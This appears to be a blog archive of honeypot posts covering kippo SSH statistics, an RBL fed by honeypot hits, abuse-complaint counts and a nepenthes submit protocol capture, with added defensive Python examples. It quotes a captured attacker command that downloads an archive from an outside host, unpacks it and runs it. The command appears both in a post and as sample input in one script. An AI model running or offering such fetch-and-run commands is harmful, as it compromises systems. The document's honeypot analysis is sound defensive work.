Posts Tagged ‘Honeypots’

projecthoneypot.org
Thursday, January 26th, 2012
Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help 🙂

kippo-graph
Wednesday, December 28th, 2011
After trying to build some nice graphs for the kippo-honeypot with PyCha I found
this little toolbox making things way better than I did:
kippo-graph Homepage (link fixed)
Here are the first results from my honeypot (no live db-queries made, so inputs
are not visible right now): Kippo-Stats

kippo stats
Wednesday, December 14th, 2011
The kippo honeypot has now been running for about a week..
Up to now I have seen
* more than 1.3 Million Connects
* more than 7.100 successful logins
* > 2.200 commands typed
* more than 2.100 different Source IP addresses
* 178 Files uploaded, most of them psyBNC bouncers
Wow.. I expected *some* brute-force attempts, but that many?

successful ssh brute-force found by kippo
Wednesday, December 7th, 2011
The sshd honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after succeeding, but some download files and try to do “things”:
-rw------- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw------- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg
coming from commands like:
CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go
I will try to build some public stats later..
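The file names above follow kippo's convention for stored downloads: a timestamp, an underscore, and the fetched URL with every non-alphanumeric character turned into an underscore. As an added example (not code from the post or from kippo itself), the script below parses such an `ls -l` listing together with kippo's `CMD:` lines, pulls the URLs out of chained `wget`/`curl` commands and ties each URL back to the files kippo stored for it, so repeated or truncated fetches of the same URL (the three differently sized W2Ksp3.exe copies) become visible. The sample listing and command lines are constructed from the post's data; the mangling rule is an assumption that fits the listing.

```python
import re
from datetime import datetime

# Constructed sample input, modelled on the listing and the CMD line in the post.
DL_LISTING = """\
-rw------- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg
"""
CMD_LOG = """\
CMD: wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
CMD: uname -a
CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go
"""


def kippo_dl_name(url: str) -> str:
    """Assumed kippo rule for naming downloads: every non-alphanumeric
    character of the URL becomes '_' (the listing above fits this)."""
    return re.sub(r'[^A-Za-z0-9]', '_', url)


def parse_listing(text: str) -> list:
    """Parse `ls -l` lines of kippo's download directory into dicts."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 8)
        if len(parts) != 9 or not parts[0].startswith('-'):
            continue  # blank lines, 'total' line, directories
        name = parts[8]
        stamp, _, mangled = name.partition('_')
        entries.append({
            'file': name,
            'size': int(parts[4]),
            'time': datetime.strptime(stamp, '%Y%m%d%H%M%S'),
            'mangled': mangled,
        })
    return entries


def extract_urls(cmd_log: str) -> list:
    """Pull every http(s) URL passed to wget/curl out of 'CMD:' lines,
    splitting chained commands on ; & | first."""
    urls = []
    for line in cmd_log.splitlines():
        if not line.startswith('CMD: '):
            continue
        for segment in re.split(r'[;&|]+', line[len('CMD: '):]):
            tokens = segment.split()
            if tokens and tokens[0] in ('wget', 'curl'):
                urls.extend(t for t in tokens[1:] if re.match(r'https?://', t))
    return urls


def match_downloads(listing: str, cmd_log: str) -> dict:
    """Map each URL an attacker fetched to the files kippo stored for it.
    Several files for one URL mean repeated fetches; differing sizes for the
    same URL usually mean truncated transfers."""
    by_mangled = {}
    for entry in parse_listing(listing):
        by_mangled.setdefault(entry['mangled'], []).append(entry)
    return {url: [e['file'] for e in by_mangled.get(kippo_dl_name(url), [])]
            for url in extract_urls(cmd_log)}


if __name__ == '__main__':
    for url, files in match_downloads(DL_LISTING, CMD_LOG).items():
        print(url, '->', files)
```

Matching on the mangled name is lossy (`EN-US` and `EN_US` collapse to the same string), so treat a hit as "probably this URL" and keep the original `CMD:` line as the authoritative record.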

C&C – honeypot
Thursday, November 4th, 2010
Now the criminals run honeypots too:
http://blog.tllod.com/2010/11/03/statistics-dont-lie-or-do-they/
Don’t trust the admin interface of a Malware Control Server..:-)

own rbl started
Saturday, May 8th, 2010
I finally managed to create my own RBL (realtime blocklist) fed by my honeypot.
All verified IPs which successfully attacked the honeypot are put into a database, which
provides an RBL for our MXes. The IPs are held for 24 hours except those which have more than 50
successful attacks within the last day. I was wondering if there were any mail-hits to be seen
at all; at least these are totally different attack vectors. But strangely enough I could see
blocked emails because of the entries made by the honeypot. We will see how well this
performs.
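The listing policy described above, as an added example (not the post's own database code): an IP stays listed for 24 hours after its last successful attack, and an IP with more than 50 successful attacks within a day stays listed for a longer period. How much longer is not stated in the post, so `LONG_HOLD` is an assumption, as are the zone name `rbl.example.` and the sample events. The lookup side shows what the MXes actually ask: the reversed octets under the zone, answered with 127.0.0.2 when listed and nothing (NXDOMAIN) otherwise.

```python
from collections import defaultdict
from datetime import datetime, timedelta

HOLD = timedelta(hours=24)      # from the post: listed 24 h after the last attack
BURST = 50                      # from the post: more than 50 successful attacks in a day
LONG_HOLD = timedelta(days=7)   # assumption: how long heavy hitters stay listed
ZONE = 'rbl.example.'           # assumption: zone name the MXes query

# Constructed sample events: (source IP, time of a successful honeypot login)
NOW = datetime(2010, 5, 8, 12, 0, 0)
EVENTS = (
    [('192.0.2.10', NOW - timedelta(hours=2))]                                    # one fresh hit
    + [('192.0.2.20', NOW - timedelta(hours=30))]                                 # one hit, too old
    + [('192.0.2.30', NOW - timedelta(hours=26, minutes=-i)) for i in range(60)]  # 60 hits, 25-26 h ago
    + [('192.0.2.40', NOW - timedelta(minutes=i)) for i in range(60)]             # 60 hits in the last hour
)


def listed_ips(events, now):
    """IPs the RBL lists at `now`. An IP stays HOLD after its last successful
    attack; an IP with more than BURST attacks in the 24 h before its last one
    stays LONG_HOLD instead (the 'except' in the post)."""
    hits = defaultdict(list)
    for ip, ts in events:
        hits[ip].append(ts)
    listed = set()
    for ip, times in hits.items():
        last = max(times)
        recent = sum(1 for t in times if last - timedelta(days=1) < t <= last)
        expiry = last + (LONG_HOLD if recent > BURST else HOLD)
        if now < expiry:
            listed.add(ip)
    return listed


def rbl_name(ip, zone=ZONE):
    """DNSBL query name: octets reversed under the zone, e.g. 10.2.0.192.rbl.example."""
    return '.'.join(reversed(ip.split('.'))) + '.' + zone


def rbl_lookup(qname, listed, zone=ZONE):
    """What the RBL answers for a query name: '127.0.0.2' if listed, else None
    (NXDOMAIN). Names outside the zone or malformed names are never listed,
    so a broken resolver cannot accidentally block everything."""
    if not qname.endswith('.' + zone):
        return None
    octets = qname[:-len(zone) - 1].split('.')
    if len(octets) != 4 or not all(o.isdigit() and int(o) < 256 for o in octets):
        return None
    return '127.0.0.2' if '.'.join(reversed(octets)) in listed else None


if __name__ == '__main__':
    current = listed_ips(EVENTS, NOW)
    for ip in sorted(current):
        print(rbl_name(ip), '->', rbl_lookup(rbl_name(ip), current))
```

Recomputing the set from the raw events on every export (rather than storing an "expires" column) keeps the policy in one place and makes it trivial to rerun with different thresholds against the history.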

50.000 complaints
Thursday, October 15th, 2009
Wow.. I finally crossed the 50.000 complaints line. I got about 18.600 replies to
my complaints; either being autoreplies by abuse departments, activity statements of the
providers or “over quota” or similar bounce messages from abuse-mailboxes.
I hope that this service does something good.

20.000 complaints
Wednesday, August 19th, 2009
Since I began sending automated complaints about attacks on my honeypot, the system has sent out more than 20.000 emails. Some positive reactions have reached me, so I hope that this service is somewhat helpful. The bounces from the unreachable abuse-addresses are funny.. I will put them on a different page soon.

New Honeypot
Tuesday, June 16th, 2009
The nepenthes team members have been busy working on a new (low interaction) honeypot.
The name dionaea is taken from another carnivore. Here is the link to the project-homepage. Sounds interesting, since it is written in C with python-modules attached.

submit-mwserv.conf
Thursday, January 1st, 2009
When dealing with the submit modules of nepenthes, you will find several notices about the favourite one of the nepenthes authors, namely submit-mwserv (with the corresponding submit-mwserv.conf file).
However, there is no hint on how to write the necessary ‘submit’ application on the receiving server side..
To see what data is actually sent, I set up a listening socket and wrote the incoming raw data to a file.
It looked like:
POST /heartbeat HTTP/1.1
User-Agent: nepenthes 0.2.2 (Linux, x86, g++)
Host: www.spamversand.de:8989
Accept: */*
Content-Length: 487
Expect: 100-continue
Content-Type: multipart/form-data; boundary=----------------------------285dc72e916a
A normal HTTP POST request. Not really normal though, because the “Expect: 100-continue” header was new to me. A quick Google check found RFC 2616, section 8.2.3, “Use of the 100 (Continue) Status”. So I will answer the request with a “100” response and see what data follows..
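The exchange described above, as an added example that is not part of the post and not nepenthes' or mwserv's own code: a minimal receiving side built on Python's `http.server`, and a raw-socket client that replays the captured headers, waits for the interim `100 Continue`, and only then sends the multipart body. The boundary is the one from the capture; the two form fields in the body are constructed, since the post shows only the headers. The caveat the stdlib hides is that `BaseHTTPRequestHandler` only answers `Expect: 100-continue` when `protocol_version` is set to `HTTP/1.1`; with the default `HTTP/1.0` a client that honours the header sits on its timeout before sending the body.

```python
import re
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

BOUNDARY = '----------------------------285dc72e916a'  # boundary from the captured request
# Constructed body: the post shows only the request headers, so these two
# fields are an assumption about the payload, not data sent by nepenthes.
BODY = (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="guid"\r\n\r\n'
        f'deadbeef\r\n'
        f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="maintainer"\r\n\r\n'
        f'sensor-1\r\n'
        f'--{BOUNDARY}--\r\n').encode()
RECEIVED = []  # (path, fields) for every POST the server accepted


def parse_form(content_type: str, body: bytes) -> dict:
    """Minimal multipart/form-data parser: {field name: raw value bytes}."""
    boundary = content_type.split('boundary=', 1)[1].strip().encode()
    fields = {}
    for chunk in body.split(b'--' + boundary):
        if chunk.startswith(b'--') or not chunk.strip():
            continue  # closing delimiter, or empty preamble
        chunk = chunk[2:] if chunk.startswith(b'\r\n') else chunk
        chunk = chunk[:-2] if chunk.endswith(b'\r\n') else chunk  # CRLF belongs to the next boundary
        head, _, value = chunk.partition(b'\r\n\r\n')
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = value
    return fields


class MwservHandler(BaseHTTPRequestHandler):
    # Required: with the default 'HTTP/1.0' the stdlib never sends 100 Continue.
    protocol_version = 'HTTP/1.1'

    def do_POST(self):
        length = int(self.headers.get('Content-Length', 0))
        body = self.rfile.read(length)  # blocks until the client sends the body
        RECEIVED.append((self.path, parse_form(self.headers['Content-Type'], body)))
        reply = b'OK\n'
        self.send_response(200)
        self.send_header('Content-Type', 'text/plain')
        self.send_header('Content-Length', str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args):  # keep the demo quiet
        pass


def _recv_until(sock, marker):
    buf = b''
    while marker not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def nepenthes_post(host, port, body):
    """Replay the captured request. Returns (interim status line, final status line, reply body)."""
    headers = (f'POST /heartbeat HTTP/1.1\r\nUser-Agent: nepenthes 0.2.2 (Linux, x86, g++)\r\n'
               f'Host: {host}:{port}\r\nAccept: */*\r\nContent-Length: {len(body)}\r\n'
               f'Expect: 100-continue\r\nContent-Type: multipart/form-data; boundary={BOUNDARY}\r\n'
               f'Connection: close\r\n\r\n')
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(headers.encode())
        interim = _recv_until(s, b'\r\n\r\n').split(b'\r\n', 1)[0].decode()
        if not interim.startswith('HTTP/1.1 100'):
            raise RuntimeError('server did not send 100 Continue: ' + interim)
        s.sendall(body)  # body goes out only after the interim response
        raw = _recv_until(s, b'<never>')  # reads until the server closes the connection
        head, _, reply = raw.partition(b'\r\n\r\n')
        return interim, head.split(b'\r\n', 1)[0].decode(), reply


def run_demo():
    """Start the receiver on a free local port, replay the request, return what happened."""
    server = HTTPServer(('127.0.0.1', 0), MwservHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        interim, final, _reply = nepenthes_post('127.0.0.1', server.server_address[1], BODY)
    finally:
        server.shutdown()
        server.server_close()
    return interim, final, RECEIVED[-1]


if __name__ == '__main__':
    print(run_demo())
```

Sending `Connection: close` lets the client read the final response up to EOF; with keep-alive it would instead have to honour `Content-Length` on the reply. A real receiver should also cap `Content-Length` before calling `rfile.read`, since a sensor under attacker control can announce an arbitrarily large body.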